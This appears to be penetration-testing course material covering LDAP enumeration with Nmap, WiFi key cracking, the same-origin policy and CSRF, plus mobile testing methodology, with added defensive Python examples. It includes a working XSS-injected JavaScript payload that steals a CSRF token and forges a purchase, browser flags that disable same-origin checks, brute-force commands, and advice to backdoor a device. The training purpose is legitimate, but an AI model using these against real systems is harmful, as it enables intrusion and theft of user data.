nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' <host>
LDAP Search
nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=users,ldap.attrib=sAMAccountName' <host>
nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=custom,ldap.searchattrib="operatingSystem",ldap.searchvalue="Windows *Server*",ldap.attrib={operatingSystem,whencreated,OperatingSystemServicePack}' <host>
ldap-search attempts to perform an LDAP search and returns all matches.
If no username and password are supplied to the script, the Nmap registry is consulted: if the ldap-brute script
was also selected and found a valid account, that account is used. Otherwise an anonymous bind is attempted as
a last resort.
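Added example (not part of the course material and not Nmap's own code): a small Python triage script for the XML output (nmap -oX) that the SMB and LDAP NSE scans in the two sections above produce. It turns raw scan output into defender-oriented findings, e.g. a host on which null-session user enumeration succeeded or a share that allows anonymous write. The embedded scan result is constructed for the example; the host addresses, account names and share names in it are made up, and the exact wording of the script output is an assumption modelled on, not copied from, what the NSE scripts print.

```python
import xml.etree.ElementTree as ET

# Ports targeted by the course's SMB and LDAP enumeration commands.
SMB_PORTS = {"tcp/139", "tcp/445", "udp/137"}
LDAP_PORTS = {"tcp/389"}

# Constructed sample in nmap's XML format: one host with SMB and LDAP open and
# script output, one host where 445 is filtered. All values are made up.
SAMPLE_XML = r"""<nmaprun scanner="nmap">
  <host>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="389"><state state="open"/><service name="ldap"/>
        <script id="ldap-search" output="Context: cn=users,dc=example,dc=test&#10;  sAMAccountName: ldaptest"/>
      </port>
    </ports>
    <hostscript>
      <script id="smb-enum-users" output="EXAMPLE\Administrator (RID: 500)&#10;EXAMPLE\svc_backup (RID: 1105)"/>
      <script id="smb-enum-shares" output="\\10.0.0.5\ADMIN$&#10;\\10.0.0.5\Backups&#10;  Anonymous access: READ/WRITE"/>
    </hostscript>
  </host>
  <host>
    <address addr="10.0.0.9" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="filtered"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_scan(xml_text):
    """Return one dict per host: address, set of open 'proto/port' keys, and script outputs by script id.
    Port scripts (e.g. ldap-search) live under ports/port; host scripts (smb-enum-*) under hostscript."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        addr = host.find("address").get("addr")
        open_ports = set()
        scripts = {}
        for port in host.findall("ports/port"):
            key = f"{port.get('protocol')}/{port.get('portid')}"
            if port.find("state").get("state") == "open":
                open_ports.add(key)
            for script in port.findall("script"):
                scripts[script.get("id")] = script.get("output", "")
        for script in host.findall("hostscript/script"):
            scripts[script.get("id")] = script.get("output", "")
        hosts.append({"address": addr, "open_ports": open_ports, "scripts": scripts})
    return hosts


def findings_for(host):
    """Translate one parsed host into findings a defender would want to act on."""
    findings = []
    smb = host["open_ports"] & SMB_PORTS
    if smb:
        findings.append(f"SMB/NetBIOS reachable on {', '.join(sorted(smb))}")
    if host["open_ports"] & LDAP_PORTS:
        findings.append("LDAP reachable on tcp/389")
    users = host["scripts"].get("smb-enum-users")
    if users:
        count = sum(1 for line in users.splitlines() if "RID:" in line)
        findings.append(f"smb-enum-users returned {count} accounts (null/guest session enumeration possible)")
    shares = host["scripts"].get("smb-enum-shares")
    if shares:
        if "Anonymous access: READ/WRITE" in shares:
            findings.append("smb-enum-shares: at least one share allows anonymous WRITE access")
        else:
            findings.append("smb-enum-shares listed shares")
    ldap = host["scripts"].get("ldap-search")
    if ldap and "sAMAccountName" in ldap:
        findings.append("ldap-search returned account attributes")
    return findings


def triage(xml_text):
    """Map each scanned address to its list of findings (empty list = nothing to report)."""
    return {h["address"]: findings_for(h) for h in parse_scan(xml_text)}


if __name__ == "__main__":
    for address, findings in triage(SAMPLE_XML).items():
        print(address, findings or "no findings")
```

To use it on a real engagement, feed the script the contents of the -oX file instead of SAMPLE_XML; the finding texts are the place to map results onto the hardening actions the environment needs (restricting anonymous SMB access, firewalling 137/139/445 and 389 from untrusted segments).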

Ability to understand the LINUX / MAC OSX Architecture and the ways in which these OS can be exploited

Basically, a similar approach to the Windows architecture applies to these *nix flavours, though historically *nix
systems were more affected through network services, usually over IP (Telnet, FTP, SSH, DNS, DHCP etc.), than
through client software, as Windows seemed to always dominate the desktop / domain sphere.

Mac OS X is more Windows-'like', which started to shift the focus 'back' to the end users, affecting client
software applications such as browsers like Safari and Firefox that are widely used and distributed with these OS.

Nevertheless, classic enumeration attacks against common Internet services and out-of-date software still offer an
opportunity for pen testers to access these OS and extend the attack within DMZs or internal networks.

Although most exploits have to circumvent OS security mechanisms such as ASLR, DEP and syscall restrictions in
different ways from how they do on Windows, the mechanics and logic (including the results) that matter for almost
all penetration testing remain the same:

the principle of finding a vulnerable service or piece of software, either locally or remotely, with the objective of
taking control of the host as a low-privilege user, further escalating to a more privileged one such as root or
Administrator, and progressing by taking control of the other hosts in the network or ultimately the entire
infrastructure.

Basic Port mapping against Windows Boxes and a Linux Server

Ports and Services enumeration / Identification of services and preparing tools for Brute Forcing
accounts.

Ability to understand network infrastructure vulnerabilities and how network devices can be exploited

Let the students identify common vulnerabilities such as enumeration, information leakage, different attack
vectors etc.

•WEP – The IEEE's first attempt at securing wireless comms. The IV used for the RC4 stream cipher was not
sufficiently random, resulting in weak encryption
•WPA – A quick fix for WEP, still using WEP's RC4 encryption but now with TKIP, which was found to have
vulnerabilities of its own as well
•WPA2-TKIP – Similar to WPA, using TKIP, which was found vulnerable to the Beck-Tews attack and others. Not as
broken as WEP, but clearly not secure

•WPA2-CCMP (AES) – The latest improvement; it replaced TKIP with CCMP, which uses AES for stronger encryption.
No issues with it so far
•All PSK – All pre-shared key setups are vulnerable to brute-force attacks. The shorter the key, the more
likely someone with a fast GPU will crack it. The key material exchanged in the WPA/WPA2 4-way handshake can be
captured and cracked offline.
•WPS – A "feature" in a lot of older wireless equipment; it introduces a vulnerability that allows an attacker to
brute-force an inadequately sized PIN and take control of the router
Some tools and tips for pen testers
•For WEP and WPA/2 cracking and bruteforcing, Aircrack-ng is the tool of choice. It's a suite that comes with
other tools such as Airmon to detect APs. BackTrack comes with all the tools and is usually the easiest way to
get up and cracking quickly
•For devices with WPS enabled, this will usually be your easy win regardless of the kind of encryption that has
been set on the AP. Use the tool Reaver: https://code.google.com/p/reaver-wps/

WEP Cracking
•Very simple and can be performed quickly if your network reach is sufficient.
•May require an external wireless card for packet injection
•If reach is not sufficient, external antennas such as a Yagi can be used
•A number of tools exist that will crack a WEP key for you; the best known of these is Aircrack-ng. BackTrack
includes the entire toolset required

WPA/WPA2 Bruteforcing – Bruteforcing is all you get
•While WPA-TKIP has its vulnerabilities, the most they will get you at the time of writing is minor
packet injection/modification
•Bruteforcing of pre-shared keys is the only attack possible against WPA/WPA2 at this time
•You will be amazed at how many times you will encounter short and weak PSKs on engagements. Bruteforcing
with a custom + good dictionary is worth your time and effort
•It is possible to capture the encrypted key material from the 4-way handshake between client and router
•Offline cracking using rainbow tables is possible; however, since the SSID is used as the salt when hashing
the key, public rainbow tables only exist for known SSIDs, making attacks against dictionary passwords
feasible
Further notes and tools
The Church of Wifi has rainbow tables for bruteforcing WPA/2 built against the 1000 most common SSIDs:
http://www.renderlab.net/projects/WPA-tables/
Use Aircrack-ng or coWPAtty (http://www.wirelessdefence.org/Contents/coWPAttyMain.htm) to bruteforce
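Added example (not from the course material, Aircrack-ng or coWPAtty): the PMK derivation that WPA/WPA2-Personal uses, written out in Python to show why the SSID acts as a salt and therefore why a precomputed table only works for the SSID it was built against. The key derivation itself (PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations, 256-bit output) is the one specified for WPA-PSK; the candidate passphrases and SSIDs are constructed values for the example. The table-building helper stores full PMKs rather than the chain structure a real rainbow table uses; it demonstrates the salting behaviour, not the storage trade-off.

```python
import hashlib


def is_valid_passphrase(passphrase: str) -> bool:
    """WPA/WPA2-Personal passphrases are 8 to 63 printable ASCII characters."""
    return 8 <= len(passphrase) <= 63 and all(32 <= ord(c) <= 126 for c in passphrase)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), as WPA/WPA2-PSK specifies.
    Because the SSID is the salt, the same passphrase gives a different PMK on every differently named network."""
    if not is_valid_passphrase(passphrase):
        raise ValueError("passphrase must be 8-63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32)


def build_table(ssid: str, candidates) -> dict:
    """Precompute PMKs for a candidate list under one SSID: the content a per-SSID table holds."""
    return {derive_pmk(p, ssid): p for p in candidates}


def lookup(table: dict, pmk: bytes):
    """Recover the passphrase for a PMK if it is in the table, else None."""
    return table.get(pmk)


def table_is_reusable(ssid_built_for: str, ssid_seen: str, candidates) -> bool:
    """True only if a table built for one SSID recovers any candidate on another network's SSID.
    A unique SSID therefore forces an attacker to recompute the whole table for that network."""
    table = build_table(ssid_built_for, candidates)
    return any(lookup(table, derive_pmk(p, ssid_seen)) is not None for p in candidates)


if __name__ == "__main__":
    # Constructed weak candidates and SSIDs for demonstration.
    candidates = ["password123", "letmein1"]
    print("same SSID, table works:", table_is_reusable("linksys", "linksys", candidates))
    print("unique SSID, table useless:", table_is_reusable("linksys", "acme-guest-7f3a", candidates))
```

Two defensive points fall out of running it: a default SSID such as "linksys" lets an attacker reuse public tables, so a unique SSID removes that shortcut; and since each candidate still costs 4096 HMAC rounds, passphrase length and unpredictability, not the cipher, decide how long an offline attack takes.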

Other Useful Wireless Techniques
•Deauth a WPA/WPA2-connected client to grab their handshake for offline cracking
•Hidden SSIDs are not really hidden. Using Airmon-ng or other wireless tools, it is possible to detect hidden APs
from requests sent to them by other clients
•A MAC whitelist approach on the AP is not really access control either. You can see current client + AP
associations and spoof your MAC address to be allowed in

Ability to understand web application vulnerabilities and how applications can be exploited
The core problem for Web Applications is that
Users have complete control over the client end:
Can submit arbitrary input
Can modify all data passing between browser and server
Can send requests and parameters in any sequence
Can use tools alongside / instead of the browser
Most attacks involve sending crafted or unexpected input:
Changing a hidden price field
Modifying a session token
Injecting code into back-end components

Normally pen testers come across multiple vulnerabilities when assessing a web application, and these top 10
tend to vary from time to time.
For example, in the early days of SQL injection most applications were affected by this devastating vulnerability,
and although it is still present in a number of applications, instances are more obscure and it is harder to get
things out of them.
Cross-Site Request Forgery seems to be one of the key findings in most applications, as developers and
technology seem to find it difficult to have a robust solution throughout the web app spectrum.
We won't put any specific weight on any of them, as all vulnerabilities can only be rated in their own context. In
other words, a Cross-Site Scripting vulnerability in one application can be of low risk or non-existent and in
some others, such as banks, can be very high. Customer perception plays a role in this as well; therefore a top 10
only means taking into consideration the common vulnerabilities (by occurrence) found within the last decade.

The Same Origin Policy is one of the main browser security features in modern browsers and came to light
through common web application security issues, such as Cross-Site Scripting.
The principal idea of this mechanism is to allow unrestrained scripting and other interactions between pages
served as part of the same site or 'domain' (usually understood as being part of the same DNS hostname or part
thereof), while preventing any interference between unrelated (and usually interconnected) sites.
Having said that, it is worth mentioning that some browser vulnerabilities in the past, such as cross-domain bugs,
existed (and still might exist) which allowed malicious websites to steal sensitive information by exploiting this
alone or in conjunction with other vulnerabilities.
Although the SOP (Same Origin Policy) can get complicated, as different OS and browser developers have been
improving the client-side browsing experience and security over the years (please visit the following article for
further information: https://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy), the basic principle is
to avoid cross-domain issues by preventing other domains from accessing sensitive information which doesn't
belong to them, mainly cookies, which usually contain session IDs etc.
A detailed comparison of several flavors of same-origin policies implemented by different companies can be
found here:
https://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy

Further information
http://en.wikipedia.org/wiki/Same-origin_policy
Relaxing the same-origin policy
In some circumstances the same-origin policy is too restrictive, posing problems for large websites that use
multiple subdomains. Here are four techniques for relaxing it:
document.domain property
If two windows (or frames) contain scripts that set domain to the same value, the same-origin policy is relaxed for
these two windows, and each window can interact with the other. For example, cooperating scripts in documents
loaded from orders.example.com and catalog.example.com might set their document.domain properties to
“example.com”, thereby making the documents appear to have the same origin and enabling each document to
read properties of the other. This might not always work as the port stored in the internal representation can
become marked as null. In other words example.com port 80 will become example.com port null because we
update document.domain. Port null might not be treated as 80 (depending on your browser) and hence might fail
or succeed depending on your browser.
Cross-Origin Resource Sharing
The second technique for relaxing the same-origin policy is being standardized under the name Cross-Origin
Resource Sharing. This draft standard extends HTTP with a new Origin request header and a new Access-
Control-Allow-Origin response header. It allows servers to use a header to explicitly list origins that may request
a file or to use a wildcard and allow a file to be requested by any site. Browsers such as Firefox 3.5 and Safari 4
use this new header to allow the cross-origin HTTP requests with XMLHttpRequest that would otherwise have
been forbidden by the same-origin policy.
Cross-document messaging
Another new technique, cross-document messaging, allows a script from one page to pass textual messages to a
script on another page regardless of the script origins. Calling the postMessage() method on a Window object
asynchronously fires an "onmessage" event in that window, triggering any user-defined event handlers. A script
in one page still cannot directly access methods or variables in the other page, but they can communicate safely
through this message-passing technique.
JSONP
JSONP allows a page to receive JSON data from a different domain by adding a <script> element to the page
which loads a JSON response from a different domain.
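Added example (not from the course material or the articles it links): the origin comparison the same-origin policy performs, and the server-side decision logic for the Cross-Origin Resource Sharing relaxation described above, in Python. It makes concrete the three things browsers compare (scheme, host, port, with default ports filled in), shows why orders.example.com and catalog.example.com are different origins, and shows how a server should answer the Origin header: echo only an allowlisted origin, never reflect arbitrary origins, and never combine a wildcard with credentials (browsers reject that combination). The host names and allowlist are constructed for the example.

```python
from urllib.parse import urlsplit

# Default ports that browsers fill in when a URL omits the port.
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_of(url: str):
    """Return the (scheme, host, port) tuple that the same-origin policy compares."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()          # hostname is already case-folded by urlsplit
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)


def same_origin(url_a: str, url_b: str) -> bool:
    """True only when scheme, host and port all match; a subdomain or port change breaks it."""
    return origin_of(url_a) == origin_of(url_b)


def serialize_origin(origin) -> str:
    """Serialize an origin tuple the way the Origin request header carries it."""
    scheme, host, port = origin
    if port == DEFAULT_PORTS.get(scheme):
        return f"{scheme}://{host}"
    return f"{scheme}://{host}:{port}"


def cors_headers(request_origin, allowed_origins, with_credentials=False):
    """Decide the Access-Control-* response headers for a request carrying an Origin header.

    allowed_origins: set of serialized origins, or {"*"} for a public, non-credentialed resource.
    Returns None when nothing should be emitted; the browser then refuses to expose the response
    to the calling script, which is the same-origin policy's default."""
    if request_origin is None:
        return None                                  # no Origin header: not a CORS request
    if "*" in allowed_origins:
        if with_credentials:
            return None                              # wildcard + credentials is invalid; don't emit it
        return {"Access-Control-Allow-Origin": "*"}
    # Normalise the presented origin before matching so that "https://a.example:443" matches
    # an allowlist entry written without the default port.
    normalized = serialize_origin(origin_of(request_origin))
    if normalized not in allowed_origins:
        return None                                  # never reflect an unknown origin back
    headers = {"Access-Control-Allow-Origin": normalized, "Vary": "Origin"}
    if with_credentials:
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers


if __name__ == "__main__":
    print(same_origin("http://orders.example.com", "http://catalog.example.com"))   # False
    allow = {"https://orders.example.com"}
    print(cors_headers("https://orders.example.com", allow, with_credentials=True))
    print(cors_headers("https://evil.example.net", allow))                           # None
```

The Vary: Origin header matters whenever the allowed origin is echoed rather than wildcarded: without it a shared cache could serve one origin's Access-Control-Allow-Origin value to a different requester.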
Getting Around SOP for Pen Testing
There are ways to turn off same origin policy in browsers. This can be exploited by attackers during targeted
attacks on certain individuals. If an attacker can have physical access to the target system, he can turn off the
SOP in that browser and can then launch his attack later on to steal certain information from the websites
browsed by the user. Below are the options to turn off SOP in different browsers.
Internet Explorer:
-> Go to the Security tab. For the current zone click the ‘Custom level’ button.
-> In the next window, look for ‘Miscellaneous > Access data sources across domains’ and set it to “Disable”.
Mozilla:
-> Open the Mozilla browser and enter ‘about:config’
-> Search for security.fileuri.strict_origin_policy and change the value to false by double clicking it as shown
below.
Google Chrome: -> Start Chrome by passing the argument below:
C:\Program Files\Chrome\Chrome.exe --disable-web-security
Safari: -> Start Safari by passing the argument below:
C:\Program Files\Safari\Safari.exe --disable-web-security

SSL should be used for authentication and ideally it should be used across a web application to protect all traffic
in transit.

CSRF Common vulnerability pattern.
The core problem:
•Web Browsers automatically include credentials in every request sent to the Server/App.
•These include requests caused by a script, form or images from another site.
•Almost all Web Apps ‘trust’ requests sent with valid (automatic) credentials to execute sensitive actions.

CSRF Common vulnerability pattern
The Core Problem
•Web browsers automatically include most credentials with each request
•Even for requests caused by a form, script, or image on another site!!
•Credentials are vulnerable! (almost all sites are this way)

Automatically Provided Credentials


•Session cookie
•Basic authentication header
•IP address
•Client side SSL certificates
•Windows domain authentication
So what about an XSS flaw in another application that belongs to the same origin?
A common observation during pen testing is that most CSRF-token-protected web applications use
a cryptographically strong random token value and store it inside the web session.
This token is then sent along with every POST request (often as a hidden form field) in order to protect state-
modifying POST requests (well implemented).
It is well known that GET requests, as long as they are not used to modify state, are often not susceptible to
CSRF attacks and therefore not protected with tokens. Furthermore, using CSRF tokens on GET requests
exposes them to other risks of leakage (think of logs, browser histories, bookmarks, etc.). And this is exactly
where the problem lies: web applications that only protect POST requests using CSRF tokens can be attacked
from an XSS vulnerability in another (maybe not so relevant) application running within the same-origin policy
context. Just think of a forum and a store sharing the same origin.
The following scenario illustrates the use of XMLHttpRequest injected into an application vulnerable to XSS
within the same origin.
An online shop is running at https://www.example.com/shop and has well-implemented CSRF tokens in
place for all of its POST requests. Users can log in using their credentials and enter a secured realm of the shop.
The only user-visible entry point into this secured realm is a simple form-based username/password dialog. This
hypothetical online shop has no XSS vulnerabilities. But on the same domain a public forum of the company that
owns the shop is running at https://www.example.com/forum, which unfortunately is affected by an XSS
vulnerability.
Now an attacker can inject the following JavaScript code, which allows the retrieval of the HTML code of the
secured realm (in case the victim is logged in at the shop), including the CSRF token that protects POST
requests:
// retrieve page content
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://www.example.com/shop/viewBalance", false);
xhr.withCredentials = true;
xhr.send(null);
// extract CSRF token from page content
var token = xhr.responseText;
var pos = token.indexOf("csrftoken");
token = token.substring(pos, token.length).substr(12, 50);
// now execute the CSRF attack using XHR along with the extracted token
xhr.open("POST", "https://www.example.com/shop/bidForProduct", false);
xhr.withCredentials = true;
var params = "productId=999929&vbid=£20&csrftoken=" + token;
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Content-length", params.length);
xhr.send(params);
This JavaScript code, injected via the XSS flaw, simply issues synchronous XHRs (XMLHttpRequest) from the
XSS-vulnerable page of example.com's forum to example.com's shop. Because this XHR is same-origin with the
targeted shop application, it is capable of reading the response of the first GET request (here the account
viewing page) along with the CSRF protection token.
The second XHR simply executes the CSRF attack using the extracted protection token. So in this scenario a
less important forum application (having a single XSS) compromises the complete CSRF protection of
the more important shop application (which itself had no XSS flaws and a CSRF implementation). That
still holds true even when both applications have their session cookies properly path-scoped to avoid direct
access from each other.
The root problem here is that the CSRF protection style of only securing POST requests with tokens is
liable to break when combined with XSS attacks, even in other applications running same-origin with the
protected application.
Now, how can this be solved? Ideally GET requests (even though they are usually not state-modifying) should be
protected using CSRF tokens. But because GET request parameters are leaked in server logs, the token used
to protect GET requests should be a different one from the token protecting POST requests.
To be even more secure, the client could use a different token for every page or, better still, renew the tokens
after each use. Unfortunately this approach has certain problems with browser back buttons and asynchronous
requests but, nevertheless, it is overall a good solution.
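Added example (not code from the course material or from any particular framework): a Python sketch of the token scheme the paragraph above recommends. Tokens are bound to the session and to the HTTP method they protect, so a token meant for GET is never accepted on a POST, and every successful validation rotates the token, so a value captured from one page renders a single use at most. The in-memory store, session identifiers and form field name are constructed for the example; in a real application the store would live in the session backend.

```python
import hmac
import secrets


class CsrfTokens:
    """Per-session, per-method CSRF tokens with single-use rotation."""

    def __init__(self):
        # (session_id, METHOD) -> current token. Constructed in-memory store for the example.
        self._tokens = {}

    def issue(self, session_id: str, method: str) -> str:
        """Mint a fresh random token for this session and method, replacing any previous one."""
        token = secrets.token_urlsafe(32)
        self._tokens[(session_id, method.upper())] = token
        return token

    def current(self, session_id: str, method: str):
        """The live token for this session and method, or None if none has been issued."""
        return self._tokens.get((session_id, method.upper()))

    def validate(self, session_id: str, method: str, presented) -> bool:
        """Accept `presented` only if it equals the live token for this session and method.

        Constant-time comparison avoids leaking the token byte by byte; on success the token is
        rotated, so the same value cannot be replayed even if it was read out of a page earlier."""
        expected = self._tokens.get((session_id, method.upper()))
        if expected is None or presented is None:
            return False
        if not hmac.compare_digest(expected, presented):
            return False
        self.issue(session_id, method)
        return True


def render_form(tokens: CsrfTokens, session_id: str) -> str:
    """Embed the POST token as a hidden field, issuing one if the session has none yet.
    GET links would carry a token from the separate 'GET' namespace so that a token leaked through
    server logs or browser history cannot be turned into a state-changing POST."""
    token = tokens.current(session_id, "POST") or tokens.issue(session_id, "POST")
    return f'<input type="hidden" name="csrftoken" value="{token}">'


if __name__ == "__main__":
    store = CsrfTokens()
    form = render_form(store, "session-A")
    post_token = store.current("session-A", "POST")
    print("first submit accepted:", store.validate("session-A", "POST", post_token))   # True
    print("replay accepted:", store.validate("session-A", "POST", post_token))         # False
```

The rotation is what gives the scheme its back-button problem: a page rendered before the rotation carries a token that is no longer live, so the application has to re-render or tolerate one stale token per session if it wants that navigation to work.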

Basic Cross-Site Scripting identification, SQLi and CSRF
The basic idea here is to be able to set up the Burp proxy to identify these common vulnerabilities in a web site
(such as Gruyere from Google or our PECB VM).
Duration of this activity: no longer than 30 minutes. It usually takes time for inexperienced web app testers to
set up the required environment. These vulnerabilities can be identified even without specific tools, by
observing the web app behaviour and inspecting the client-side source code.
Tools that can be used instead of Burp Suite are:
Fiddler Debugger (Windows only)
Paros Proxy (Java)
WebScarab (Java)
Burp proxy (Java)

Methodology Tips
The basic Pen Testing methodology used across this course can also be applied to Mobile Security
Recon — Identify the types of mobile devices used in a target environment, and the applications used.
Consider using social networking data ("Posted with Tweetie for iOS"), e-mail headers ("X-Mailer: iPhone Mail
(10B143)") or Satori fingerprints for insider or public network/hotspot attacks.
Scanning — For local mobile device attacks, identify the wireless networks sought by the mobile device by
inspecting network probes. Commonly weak network names such as "attwifi" and "linksys" are easy targets to
impersonate and lure a victim into a hostile network.
Exploitation — Use man-in-the-middle attacks to intercept and inspect network protocols. Use traffic insertion
attacks to deliver client-side exploits to vulnerable devices, or manipulate captured traffic to exploit supporting
back-end mobile application servers. If you have physical possession of a device, bypass device passcode use
by physically connecting the device to an attack workstation to root or jailbreak the device, exposing the
filesystem data.
Post-Exploitation — Inspect commonly sensitive data areas on mobile devices for information such as the
Notes, SMS, and browser history databases. Look for stored passwords in third-party applications, and for
opportunities to extract saved passwords from keychain storage. If it is within scope, consider adding a backdoor
to the mobile device and returning to the end-user, giving you remote access to trusted networks.
Quick Activity for participants – What would be a Scoping - Mobile Questionnaire?
Which mobile platforms?
Will source code be available?
What is the high-level purpose of the application?
Does it use transport level encryption?
Does it have jailbreak detection if running on iOS / Android?
Does it store on device personal information?
Does it store on device other sensitive information?
What are the expected uses, to help evaluate Android Permissions defined?

Ability to understand mobile device vulnerabilities and how such devices can be exploited
Mobile pen testing can span multiple areas of exploration.
Mobile Applications
Apps that run on mobile devices. Developers can make mistakes when implementing their own apps or can even
open new attack vectors. Although most platforms offer specific security solutions and guidelines on how to
develop these apps, pen testers should be reviewing that they are followed and that they cannot be subverted.
Mobile Devices
Hardware integration / The device itself
Extensibility ports / Memory extensions etc.
When pen testing a device the approach will most likely be a black-box assessment, in which the client wants to
play out the scenarios of a device being stolen or a device that is used for taking payments / traffic
enforcement etc.
Infrastructure also plays a big part in this type of assessment, such as reviewing WiFi / Bluetooth / SMS or any
other comms available to the device.
Mobile OS Specific
OS-specific flaws
Jailbreaking / Debugging
Understanding how each mobile manufacturer and OS integrates with the applications and development process
is crucial when pen testing mobile security. The signing process, and how applications can bypass or detect
whether a device has been jailbroken, can strengthen or weaken a mobile solution for an organization.
Web Mobile
Apps using web integrations / PhoneGap/Cordova scripting
Web Apps through mobiles
Web Mobile is growing in numbers as most companies are developing platform-independent applications
running powerful integrations between the remote web application and the underlying OS.
This approach gives certain flexibility and control from the server side for updates, tweaks and
functionality, as application changes don't need to be re-published on specific app stores. However, it brings a
new bag of attack vectors in which a bad implementation could allow JavaScript execution in the phone's
context and potentially hardware interaction such as taking a picture or video with the camera or reading a file
from the file system.

Methodology Tips
The basic pen testing methodology used across this course can also be applied to mobile security:
Recon — Identify the types of mobile devices used in a target environment and the applications used.
Consider using social networking data ("Posted with Tweetie for iOS"), e-mail headers ("X-Mailer: iPhone Mail
(10B143)") or Satori fingerprints for insider or public network/hotspot attacks.
Scanning — For local mobile device attacks, identify the wireless networks sought by the mobile device by
inspecting network probes. Commonly weak network names such as "attwifi" and "linksys" are easy targets to
impersonate in order to lure a victim onto a hostile network.
Exploitation — Use man-in-the-middle attacks to intercept and inspect network protocols. Use traffic insertion
attacks to deliver client-side exploits to vulnerable devices, or manipulate captured traffic to exploit the supporting
back-end mobile application servers. If you have physical possession of a device, bypass the device passcode
by physically connecting the device to an attack workstation to root or jailbreak it, exposing the
filesystem data.
Post-Exploitation — Inspect the commonly sensitive data areas on mobile devices, such as the Notes, SMS and
browser history databases. Look for stored passwords in third-party applications, and for opportunities to
extract saved passwords from keychain storage. If it is within scope, consider adding a backdoor to the mobile
device and returning it to the end user, giving you remote access to trusted networks.
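The recon and scanning steps above rely on what devices give away on their own: client fingerprints in mail headers and the names of remembered networks in probe requests. As an added example (not part of the course material), the Python below runs the same two checks from the defender's side, so a security team can measure its own exposure before an assessment does. The mail message and probe-request log lines are constructed for the example, and the log format is an assumed wireless-IDS export rather than any real tool's output; the SSID list contains the two names the slide mentions.

```python
import email
import re
from email import policy

# Constructed sample message; the X-Mailer value is the one quoted above.
SAMPLE_MAIL = """From: alice@example.com
To: bob@example.com
Subject: Q3 numbers
X-Mailer: iPhone Mail (10B143)
Content-Type: text/plain

Sent from my phone.
"""

# Headers that reveal the sending client, device or originating address.
FINGERPRINT_HEADERS = ("X-Mailer", "User-Agent", "X-Originating-IP")

# Constructed probe-request log lines in an assumed "sta=<mac> ssid=<name>" format.
PROBE_LOG = """2020-05-24T10:00:01 PROBE_REQ sta=aa:bb:cc:11:22:33 ssid="attwifi"
2020-05-24T10:00:02 PROBE_REQ sta=aa:bb:cc:11:22:33 ssid="CorpWiFi-Secure"
2020-05-24T10:00:03 PROBE_REQ sta=dd:ee:ff:44:55:66 ssid="linksys"
2020-05-24T10:00:04 PROBE_REQ sta=dd:ee:ff:44:55:66 ssid=""
"""

# Open-hotspot names from the slide; a real deployment would extend this list.
OPEN_HOTSPOT_NAMES = {"attwifi", "linksys"}

PROBE_RE = re.compile(r'PROBE_REQ sta=(?P<sta>[0-9a-f:]{17}) ssid="(?P<ssid>[^"]*)"')


def find_client_fingerprints(raw_message):
    """Return {header: value} for every fingerprinting header present in an outbound mail."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    return {h: str(msg[h]) for h in FINGERPRINT_HEADERS if msg[h] is not None}


def stations_probing_weak_ssids(log_text):
    """Map station MAC -> sorted list of remembered open-hotspot SSIDs it probes for.

    A device that still remembers "attwifi" will auto-join any AP that announces
    that name, which is exactly what the impersonation step counts on.
    """
    hits = {}
    for line in log_text.splitlines():
        m = PROBE_RE.search(line)
        if not m or not m.group("ssid"):
            continue  # broadcast (empty-SSID) probes reveal nothing about saved networks
        if m.group("ssid").lower() in OPEN_HOTSPOT_NAMES:
            hits.setdefault(m.group("sta"), set()).add(m.group("ssid"))
    return {sta: sorted(names) for sta, names in hits.items()}


if __name__ == "__main__":
    print(find_client_fingerprints(SAMPLE_MAIL))
    print(stations_probing_weak_ssids(PROBE_LOG))
```

The usual mitigations follow directly from the output: strip X-Mailer and similar headers at the mail gateway, and have the MDM profile remove remembered open networks so devices stop advertising them.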
Quick activity for participants: what would a mobile scoping questionnaire contain?
Which mobile platforms?
Will source code be available?
What is the high-level purpose of the application?
Does it use transport level encryption?
Does it have jailbreak detection if running on iOS / Android?
Does it store personal information on the device?
Does it store other sensitive information on the device?
What are the expected uses (to help evaluate the Android permissions defined)?

Mobile device pen testing using social engineering methodologies to evaluate the security posture of
an organization.
Web form impersonation
Phishing tests seeded with links to web forms designed to capture and record user-entered data, such as
usernames, passwords or other sensitive data, in order to assess data leakage through the use of mobile devices.
Fake wireless access points
Impersonate valid wireless access points in an attempt to trick users into connecting their devices, capturing
sensitive data and potentially carrying out man-in-the-middle attacks.
Phishing emails and SMS
Send emails and texts to determine whether the organization's employees would fall prey to phishing and spear
phishing attacks, either by clicking through to rogue controlled sites and/or installing arbitrary mobile apps.
Wireless man-in-the-middle (MITM) attacks
Identify and monitor wireless networks that have either no encryption or WEP-based encryption, and observe
any connected devices.

Privacy issues are usually related to the following entry points:
• UDID and MAC address on iOS devices
• Geolocations stored by apps
• Local data storage analysis
• Plist files and XML files
• SQLite files
• Temporary files
• Keyboard cache
• Snapshot storage
• Clipboard cache
• Error logs, etc.
